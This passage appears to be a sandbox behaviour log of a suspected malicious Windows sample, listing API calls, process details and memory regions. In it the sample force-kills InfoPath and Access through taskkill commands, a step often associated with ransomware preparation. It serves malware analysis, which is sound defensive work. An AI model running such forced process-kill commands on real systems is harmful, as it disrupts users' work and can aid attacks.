_wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0206.202] GetProcessHeap () returned 0x760000 [0206.202] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x767700) returned 1 [0206.202] GetProcessHeap () returned 0x760000 [0206.203] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa) returned 0x767ea0 [0206.203] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0206.208] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im infopath.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im infopath.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im infopath.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0xf5c, dwThreadId=0xeb8)) returned 1 [0206.225] CloseHandle (hObject=0x98) returned 1 [0206.225] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0206.225] GetProcessHeap () returned 0x760000 [0206.225] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x769e60) returned 1 [0206.226] GetEnvironmentStringsW () returned 0x769e60* [0206.226] GetProcessHeap () returned 0x760000 [0206.226] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa76) returned 0x767fe8 [0206.226] FreeEnvironmentStringsA (penv="=") returned 1 [0206.226] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0207.720] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0207.720] CloseHandle (hObject=0x9c) returned 1 [0207.721] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0207.721] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0207.723] GetProcessHeap () returned 0x760000 [0207.723] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x767fe8) returned 1 [0207.724] GetEnvironmentStringsW () returned 0x76b2a0* [0207.724] GetProcessHeap () returned 0x760000 [0207.724] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa9c) returned 0x767fe8 [0207.724] FreeEnvironmentStringsA (penv="=") returned 1 [0207.724] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0207.724] GetProcessHeap () returned 0x760000 [0207.724] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x767fe8) returned 1 [0207.724] GetEnvironmentStringsW () returned 0x76b2a0* [0207.724] GetProcessHeap () returned 0x760000 [0207.724] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa9c) returned 0x767fe8 [0207.724] FreeEnvironmentStringsA (penv="=") returned 1 [0207.725] GetProcessHeap () returned 0x760000 [0207.725] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x767ea0) returned 1 [0207.725] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0207.725] _get_osfhandle (_FileHandle=1) returned 0x154 [0207.725] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x154 [0207.725] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0207.725] _get_osfhandle (_FileHandle=0) returned 0x144 [0207.725] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0207.725] GetConsoleOutputCP () returned 0x1b5 [0207.726] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0207.726] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.729] exit (_Code=128) Thread: id = 326 os_tid = 0x654 Process: id = "60" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x5fadb000" os_pid = "0xf5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xf60" cmd_line = "taskkill /f /im infopath.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4422 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4423 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4424 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4425 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 4426 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 4427 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 4428 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 4429 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 4430 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 4431 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 4432 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 4433 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4434 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4435 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4436 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4437 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 4438 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4439 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 4440 start_va = 0x44f0000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 4441 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4442 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4443 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4444 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4445 start_va = 0x4500000 end_va = 0x47effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 4446 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4447 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4448 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4449 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4450 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4451 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4452 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4453 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4454 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 4455 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 4456 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4457 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4458 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4459 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4460 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4461 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4462 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4463 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4464 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4465 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4466 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4467 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4468 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 4469 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4470 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 4471 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 4472 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 4473 start_va = 0x4500000 end_va = 0x45bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 4474 start_va = 0x46f0000 end_va = 0x47effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 4475 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4476 start_va = 0x47f0000 end_va = 0x4977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047f0000" filename = "" Region: id = 4477 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4478 start_va = 0x4980000 end_va = 0x4b00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004980000" filename = "" Region: id = 4479 start_va = 0x4b10000 end_va = 0x5f0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b10000" filename = "" Region: id = 4480 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4481 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 4482 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 4483 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 4484 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 4485 start_va = 0x5f10000 end_va = 0x6246fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4486 start_va = 0x45c0000 end_va = 0x46a9fff monitored = 0 entry_point = 0x45fd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4487 start_va = 0x44b0000 end_va = 0x44b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 4488 start_va = 0x45c0000 end_va = 0x469ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 4489 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4490 start_va = 0x44c0000 end_va = 0x44c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044c0000" filename = "" Region: id = 4491 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4492 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 4493 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4494 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4495 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4496 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 4497 start_va = 0x4500000 end_va = 0x453ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 4498 start_va = 0x4540000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 4499 start_va = 0x45b0000 end_va = 0x45bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 4500 start_va = 0x46a0000 end_va = 0x46dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 4501 start_va = 0x6250000 end_va = 0x628ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006250000" filename = "" Region: id = 4502 start_va = 0x6290000 end_va = 0x62cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006290000" filename = "" Region: id = 4503 start_va = 0x62d0000 end_va = 0x630ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062d0000" filename = "" Region: id = 4504 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 4505 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 4506 start_va = 0x44e0000 end_va = 0x44e5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Thread: id = 327 os_tid = 0xeb8 Thread: id = 328 os_tid = 0xdc4 Thread: id = 329 os_tid = 0x3a0 Thread: id = 330 os_tid = 0xe64 Thread: id = 331 os_tid = 0x8f4 Process: id = "61" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2ee35000" os_pid = "0xc44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im msaccess.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4508 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4509 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4510 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4511 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4512 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4513 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4514 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4515 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4516 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4517 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4518 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 4519 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4520 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4521 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4522 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4523 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 4524 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4525 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 4526 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 4527 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4528 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = 